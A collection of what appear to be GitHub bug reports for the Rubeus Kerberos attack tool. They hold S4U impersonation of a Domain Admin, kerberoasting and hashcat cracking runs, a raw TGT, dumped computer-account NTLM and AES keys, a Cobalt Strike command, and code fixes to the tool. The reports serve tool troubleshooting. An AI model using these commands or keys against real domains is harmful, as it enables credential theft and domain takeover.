  QUJTLkNPTaOCA90wggPZoAMCARKhAwIBAqKCA8sEggPHCHEZUk6cFgzygCwKDHNBIOzsASgUU71oObTLeO3+auqYTSBSpk3k6LPq
  bJerplsgo7iijLdZeTDRcHeNjS66MC6z4pFO+xgsjIWEpI/f3Ou4gozQi2goglKoZ/suixrQyRxJCYl7VZZtyqwrR6m19N2dGAXG
  BmI1mKiJCtEkYnew8d2QrKuNoWHSPjK8Yf0sF93u76foKCokjYYr9Em5Lys37oH5iHaHGOmJF87OoZtmPPQ0vilEeD9Atc5dLhGw
  qPXG0fnjn3Z4ysMWHuKpOTpT37NBjYZK3zrPLsHjznC4fRrSQNIooXk47dHPSyAeS4vZpYx3RF2flC4rM9TdK2esks7IM15LWhfM
  1Le1dRwlFuFWKxMXBl9uNj8D2ZsopHZIA/b+PKo0vItpLKE7XsNUHA+sPMxIRd8xpkFqGvFpYLhK025W9lS/cpS9c+TTh4VbbQJG
  cWXcuw5Saj3VSr3hY3U5xBuyGfB7F448wm+dqwNVshdAoR/EXcAD4Qd2Qe8pHtHLv5IZdgpUBbIj9fYrm9UpS1tZrD2UCXnLcB2E
  6E3NP+uAZpqnIDT1XXfpc/7W9Cfu1UcAxRBNFehRXWtxFShH4dKPF3Q59MOOQ8dXCKBQdt3fwrVLqVCHHJ/VOwHg3nYBhkVVtKw0
  rmmumtvuQ5C+JjCQj96/VjNLeZLVrPMHpFgTm08BSNyQ80iTFRQcdD80KJE2IduODatyy3Lnn6W1G7tts52X8rY+wslppciWI/CY
  rTnjcLw+MmqNuiL1iQrgIOnYUPU+wUJSCZvDpc/LwW6ovPzyKqz4poM5K9U2b+CdTxJlOrOaPKyKbqPr7ZKyTTIe+3ZDjcx8N6M6
  BxvOm04PhdWEoqPRDAySF2A/x90AqklxuP46eQ8ppZ89pXhzXTbWc1GQ+MyPV42pWK1ZEMSPtCRufN7uu1SYMxDC7BqIpEjvVxeC
  O9/lEhkRdWOu20yK0krmlNM/FX4/pU9pSEtWp+dhWUTV1nsrD75PmO1xUjV3dwyaXtD3ciK9XbTglg+iSgukNaicBiBdA3P4G/H0
  PzO6BsLOGUEIhyEXCFNGl4KEWzm176k+jQoQjbtocDoSlah2n9lNe8kjHd1TEAKFmRLaOacPxz3UdLdP8xB/umspeuJ3V2H+y1H4
  5fkJ5V4WdLtVHDpaPocdWeNB7/jMrxP5g1HFnpU4LsAcZeHC0YSDPSbZCdefD8uAh9dt8AEKIl4sEwWCKnPhGG7PyeZmebbO0Xji
  dbnv00m6W9eomfTjCGNQxNAj3Y57KWZRHKOB3DCB2aADAgEAooHRBIHOfYHLMIHIoIHFMIHCMIG/oCswKaADAgESoSIEIBBc8btI
  DBR571xAPNee+X624T3Sskliv2PO9UZkwGn+oQobCExBQlMuQ09NohcwFaADAgEBoQ4wDBsKTEFCUy1EQzAxJKMHAwUAYKEAAKUR
  GA8yMDE5MDIwMTA4MjUzOFqmERgPMjAxOTAyMDExODI1MzdapxEYDzIwMTkwMjA4MDgyNTM3WqgKGwhMQUJTLkNPTakdMBugAwIB
  AqEUMBIbBmtyYnRndBsITEFCUy5DT00=

Then, I am using the s4u action with the harvested TGT ticket (i have provided it both in base64 raw format and in .kirbi format after proper conversion) in order to impersonate a Domain Admin account and get a TGS ticket for the CIFS service on the DC.

The problem is that I am getting the following error during the execution of s4u action:
Execution of S4U Action:
.\Rubeus.exe s4u /impersonateuser:Administrator /ticket:<base64-ticket-value> /msdsspn:cifs/labs-dc01.labs.com

OR:

[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<base64-ticket-value>")) .\Rubeus.exe s4u /impersonateuser:Administrator /ticket:ticket.kirbi /msdsspn:cifs/labs-dc01.labs.com

Error:

[] Action: S4U
[] Using domain controller: LABS-DC01.labs.com (10.10.10.20)
[] Building S4U2self request for: 'LABS.COM\LABS-DC01$'
[] Impersonating user 'Administrator' to target SPN 'cifs/labs-dc01.labs.com'
[] Sending S4U2self request
[] Connecting to 10.10.10.20:88
[] Sent 1458 bytes
[] Received 1482 bytes
[+] S4U2self success!
[] Building S4U2proxy request for service: 'cifs/labs-dc01.labs.com'
[] Sending S4U2proxy request
[] Connecting to 10.10.10.20:88
[] Sent 2557 bytes
[*] Received 127 bytes
Unhandled Exception: System.OverflowException: Value was either too large or too small for a UInt32.
at System.Convert.ToUInt32(Int64 value)
at Rubeus.KRB_ERROR..ctor(AsnElt body)
at Rubeus.S4U.Execute(KRB_CRED kirbi, String targetUser, String targetSPN, Boolean ptt, String domainController, String altService)
at Rubeus.Commands.S4u.Execute(Dictionary2 arguments)
at Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary2 arguments)

Is that an issue indeed or i am missing something?

I was having an issue getting the domain controller during my testing of the kerberoasting functionality. The issue seems to be the function GetDCName(). Note, I ran this with and without the built in impersonation, and using the SimpleImpersonation library. My solution for my very specific use case was to modify the GetDCName() code as follows:

if (ERROR_SUCCESS == val) { domainInfo = (Interop.DOMAIN_CONTROLLER_INFO)Marshal.PtrToStructure(pDCI, typeof(Interop.DOMAIN_CONTROLLER_INFO)); string dcName = domainInfo.DomainControllerName; Interop.NetApiBufferFree(pDCI); return dcName.Trim('\\'); } else { try { **string pdc = System.DirectoryServices.ActiveDirectory.Domain.GetCurrentDomain().PdcRoleOwner.Name; return pdc;** } catch { string errorMessage = new Win32Exception((int)val).Message; Console.WriteLine("\r\n [X] Error {0} retrieving domain controller : {1}", val, errorMessage); Interop.NetApiBufferFree(pDCI); return ""; } }

This seems to have solved my little issue. But just wanted to let you know.

Executing x86 Rubeus dump on Windows7x64 gives such error as:

Action: Dump Kerberos Ticket Data (All Users)

[*] Current LUID    : *******

[X] Exception: Rubeus.lib.Interop.NtException: NTSTATUS error code 0xC0000140: Unknown error (0xc0000140)
   at Rubeus.LSA.EnumerateTickets(Boolean extractTicketData, LUID targetLuid, String targetService, String targetUser, String targetServer, Boolean includeComputerAccounts, Boolean
 silent)

[!] Unhandled Rubeus exception:

System.NullReferenceException: Object reference not set to an instance of an object.
   at Rubeus.LSA.DisplaySessionCreds(List`1 sessionCreds, TicketDisplayFormat displayFormat, Boolean showAll)
   at Rubeus.Commands.Dump.Execute(Dictionary`2 arguments)
   at Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at Rubeus.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)

After inspection of LsaRegisterLogonProcess P/Invoke signature and MSDN , I've found that 'ref' specifier is missing at the first arg.

[DllImport("secur32.dll", SetLastError = true)]
        public static extern int LsaRegisterLogonProcess(
            LSA_STRING_IN LogonProcessName,
            out IntPtr LsaHandle,
            out ulong SecurityMode
        );

Proof: (https://docs.microsoft.com/en-us/windows/win32/api/ntsecapi/nf-ntsecapi-lsaregisterlogonprocess) [in] PLSA_STRING LogonProcessName : Pointer to an LSA_STRING structure identifying the logon application.

So, the signature should be:

[DllImport("secur32.dll", SetLastError = true)]
        public static extern int LsaRegisterLogonProcess(
            ref LSA_STRING_IN LogonProcessName,
            out IntPtr LsaHandle,
            out ulong SecurityMode
        );

and call:

public static IntPtr LsaRegisterLogonProcessHelper()
        {
            // helper that establishes a connection to the LSA server and verifies that the caller is a logon application
            //  used for Kerberos ticket enumeration for ALL users

            var logonProcessName = "User32LogonProcesss"; // yes I know this is "weird" ;)
            Interop.LSA_STRING_IN LSAString;
            var lsaHandle = IntPtr.Zero;
            UInt64 securityMode = 0;

            LSAString.Length = (ushort)logonProcessName.Length;
            LSAString.MaximumLength = (ushort)(logonProcessName.Length + 1);
            LSAString.Buffer = logonProcessName;

            var ret = Interop.LsaRegisterLogonProcess(ref LSAString, out lsaHandle, out securityMode);
            
            return lsaHandle;
        }

On this line

To run on .NET 4.X without recompile and retargeting, you need to create a Rubeus.exe.config:

<?xml version="1.0" encoding="utf-8"?>
<configuration>
    <startup>
        <supportedRuntime version="v2.0.50727"/>
        <supportedRuntime version="v4.0"/>
    </startup>
</configuration>

Can you add it to the VS project?

It seems like the Kerberoast functionality is not working correctly.
Cracking the hash with tgsregcrack works fine:

However with Rubeus it does not work ...

.\Rubeus.exe kerberoast /tgtdeleg /outfile:hashes.txt /format:hashcat /spn:"MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: Kerberoasting

[*] Using 'tgtdeleg' to request a TGT for the current user
[*] RC4_HMAC will be the requested for AES-enabled accounts, all etypes will be requested for everything else

[*] Target SPN             : MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local
[*] Hash written to C:\AD\kerberoast\hashes.txt

[*] Roasted hashes written to : C:\AD\kerberoast\hashes.txt

as cracking with hashcat fails:

.\hashcat64.exe -m 13100 --force .\hashes.txt -a 0 .\wordlists\10k-worst-pass.txt

Session..........: hashcat
Status...........: Exhausted
Hash.Type........: Kerberos 5 TGS-REP etype 23
Hash.Target......: $krb5tgs$23$*USER$DOMAIN$MSSQLSvc/dcorp-mgmt.dollar...ad4360
Time.Started.....: Tue Feb 18 15:49:29 2020 (0 secs)
Time.Estimated...: Tue Feb 18 15:49:29 2020 (0 secs)
Guess.Base.......: File (.\wordlists\10k-worst-pass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   202.2 kH/s (5.59ms) @ Accel:4 Loops:1 Thr:64 Vec:1
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 10009/10009 (100.00%)
Rejected.........: 0/10009 (0.00%)
Restore.Point....: 10009/10009 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: ramones -> eyphed

If you run run this from a non domain machine:

Rubeus.exe asktgt /user:test /password:passw0rd /domain:kerb.local

You get the following error:

v2.0.0

[*] Action: Ask TGT

[*] Using rc4_hmac hash: B9F917853E3DBF6E6831ECCE60725930
[*] Building AS-REQ (w/ preauth) for: 'kerb.local\test'

 [X] Error 1355 retrieving domain controller : The specified domain either does not exist or could not be contacted
[X] Error: No domain controller could be located

[X] Unable to get domain controller address

Of course you can manually specify a domain controller with /dc but you shouldn't have to do this and none of the other commands require this.

It looks like its because even though the GetDCIP function accepts a domain name, AskTgt doesn't provide one to it (even though it knows the domain name at that point).

The nonce, sequence number should be randomized:

%> grep 1818848256 -R
Rubeus/lib/krb_structures/EncKrbPrivPart.cs:            seq_number = 1818848256;
Rubeus/lib/krb_structures/EncKrbPrivPart.cs:            seq_number = 1818848256;
Rubeus/lib/krb_structures/KDC_REQ_BODY.cs:            nonce = 1818848256;
Rubeus/lib/Reset.cs:            ap_req.authenticator.seq_number = 1818848256;

Secrets Dump of Computer Account:

Impacket v0.9.22.dev1+20200713.100928.1e84ad60 - Copyright 2020 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
KNOWNPASS$:5604:aad3b435b51404eeaad3b435b51404ee:88e4d9fabaecf3dec18dd80905521b29:::
[*] Kerberos keys grabbed
KNOWNPASS$:aes256-cts-hmac-sha1-96:fab6a368ec18a579bd20e1841050506c78c729523269053f356711cb60fdc804
KNOWNPASS$:aes128-cts-hmac-sha1-96:e3c578d8ca4081b338ebc46da11d84cf
KNOWNPASS$:des-cbc-md5:23e994e623d9a7da
[*] Cleaning up...

Rubeus Run with Dollar Sign:

PS C:\tools\Rubeus\Rubeus\bin\Release> .\Rubeus.exe hash /password:ASDqwe123 /user:KNOWNPASS$ /domain:SITTINGDUCK.INFO

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: Calculate Password Hash(es)

[*] Input password             : ASDqwe123
[*] Input username             : KNOWNPASS$
[*] Input domain               : SITTINGDUCK.INFO
[*] Salt                       : SITTINGDUCK.INFOKNOWNPASS$
[*]       rc4_hmac             : 88E4D9FABAECF3DEC18DD80905521B29
[*]       aes128_cts_hmac_sha1 : 19DCD95F5BFC708EB0B55FACB957A8AE
[*]       aes256_cts_hmac_sha1 : 779030492A1FEC903958A23BDF66E6B948AA50593D8B54BE2241D6B5C6C6EDFD
[*]       des_cbc_md5          : B6ADDC3E9B025864

Rubeus Run without Dollar Sign:

PS C:\tools\Rubeus\Rubeus\bin\Release> .\Rubeus.exe hash /password:ASDqwe123 /user:KNOWNPASS /domain:SITTINGDUCK.INFO

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: Calculate Password Hash(es)

[*] Input password             : ASDqwe123
[*] Input username             : KNOWNPASS
[*] Input domain               : SITTINGDUCK.INFO
[*] Salt                       : SITTINGDUCK.INFOKNOWNPASS
[*]       rc4_hmac             : 88E4D9FABAECF3DEC18DD80905521B29
[*]       aes128_cts_hmac_sha1 : B6164E916BC05830B9211A4B7C148EFC
[*]       aes256_cts_hmac_sha1 : 7AD0ED9CB365687EEAA29D971BD88ACF2C9F4766C21B99DAACDA373DD78EF0A6
[*]       des_cbc_md5          : 862CBA803D25738F

Neither the AES128 nor the AES256 match up for the Computer Account

• AES256 Dump - FAB6A368EC18A579BD20E1841050506C78C729523269053F356711CB60FDC804

• AES256 CMP$ - 779030492A1FEC903958A23BDF66E6B948AA50593D8B54BE2241D6B5C6C6EDFD

• AES256 CMP - 7AD0ED9CB365687EEAA29D971BD88ACF2C9F4766C21B99DAACDA373DD78EF0A6

• AES128 Dump - E3C578D8CA4081B338EBC46DA11D84CF

• AES128 CMP$ - 19DCD95F5BFC708EB0B55FACB957A8AE

• AES128 CMP - B6164E916BC05830B9211A4B7C148EFC

Interesting issue ...

[*] Sending S4U2self request
[*] Connecting to 172.16.177.130:88
[*] Sent 1452 bytes
[*] Received 1432 bytes
[+] S4U2self success!
[*] Building S4U2proxy request for service: 'CIFS/WEB01'
[*] Sending S4U2proxy request
[*] Connecting to 172.16.177.130:88
[*] Sent 2487 bytes
[*] Received 120 bytes

Unhandled Exception: Asn1.AsnException: integer overflow (positive)
   at Asn1.AsnElt.GetInteger()
   at Rubeus.KRB_ERROR..ctor(AsnElt body)
   at Rubeus.S4U.Execute(KRB_CRED kirbi, String targetUser, String targetSPN, Boolean ptt, String domainController, String altService)
   at Rubeus.Commands.S4u.Execute(Dictionary`2 arguments)
   at Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   at Rubeus.Program.Main(String[] args)

I would be a great help to have an option in asktgt/tgs commands to store the ticket directly in a file ;), instead of having to use the powershell [IO:File]::WriteAllBytes, which is a little cumbersome.

Good day.
Trying to run Rubeus monitor. On all systems (Win10 and Win7) same issue. Tried at local Admin, Domain admin, User... Same. Tried disabling UAC.

PS C:\> .\Rubeus.exe monitor

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.5.0

[*] Action: TGT Monitoring
[*] Monitoring every 60 seconds for new TGTs


[!] Unhandled Rubeus exception:

System.Exception: Could not elevate to system
   в Rubeus.LSA.GetLsaHandle()
   в Rubeus.LSA.EnumerateTickets(Boolean extractTicketData, LUID targetLuid, String targetService, String targetUser, St
ring targetServer, Boolean includeComputerAccounts, Boolean silent)
   в Rubeus.Harvest.HarvestTicketGrantingTickets()
   в Rubeus.Commands.Monitor.Execute(Dictionary`2 arguments)
   в Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary`2 arguments)
   в Rubeus.Program.MainExecute(String commandName, Dictionary`2 parsedArgs)
PS C:\>

When running the monitor command with the following parameters in Cobalt Strike:

execute-assembly /tmp/rubeus.exe monitor /interval: 5

The monitoring function works (as determined by the tool outputting the various 4624 events that are occurring, but instead of dumping the TGT information along with the hash, we get the following error:

[x] Value was either too large or too small for a UInt32

I took a loot through the associated code for Marvest and noted that the luid value was being converted to a UInt32. Without knowing why this could be an issue, I change instances of uint32 to uint64 for Monitor as well as associated Harvest functions, recompiled and I got no more errors! I haven't submitted a PR because, well, I'm not sure if what I did is fixing the root cause error or if I am just bumbling around.

Also... my "fix" rendered the tool able to print out some information that it previously did not (Target luid, and Target service), it returns that it was able to Extract 0 tickets.. I'm not sure if this is related to my "fix" or some other thing..

I'm executing:
Rubeus.exe kerberoast /rc4opsec

After a lot of tickets are retrieved I'm getting the following exception:

System.NullReferenceException: Object reference not set to an instance of an object. at Rubeus.Roast.Kerberoast(String spn, String userName, String OUName, String domain, String dc, NetworkCredential cred, String outFile, Boolean simpleOutput, KRB_CRED TGT, Boolean useTGTdeleg, String supportedEType, String pwdSetAfter, String pwdSetBefore, String ldapFilter, Int32 resultLimit, Boolean userStats) at Rubeus.Commands.Kerberoast.Execute(Dictionary2 arguments)
at Rubeus.Domain.CommandCollection.ExecuteCommand(String commandName, Dictionary2 arguments) at Rubeus.Program.MainExecute(String commandName, Dictionary2 parsedArgs)`